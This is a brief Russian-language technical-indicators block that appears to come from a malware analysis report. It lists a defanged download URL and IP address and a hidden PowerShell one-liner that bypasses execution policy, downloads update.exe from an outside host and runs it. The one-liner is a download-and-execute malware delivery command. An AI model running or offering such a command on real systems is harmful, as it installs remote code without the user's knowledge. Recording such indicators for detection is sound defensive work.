Техническая информация
- http://18#.#17.73.66/update.exe как %temp%\update345.exe
- '18#.#17.73.66':80
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://18#.#17.73.66/update.exe','%TEMP%\update345.exe'); Start-Process('%TEMP%\update345.exe')' (со скрытым окном)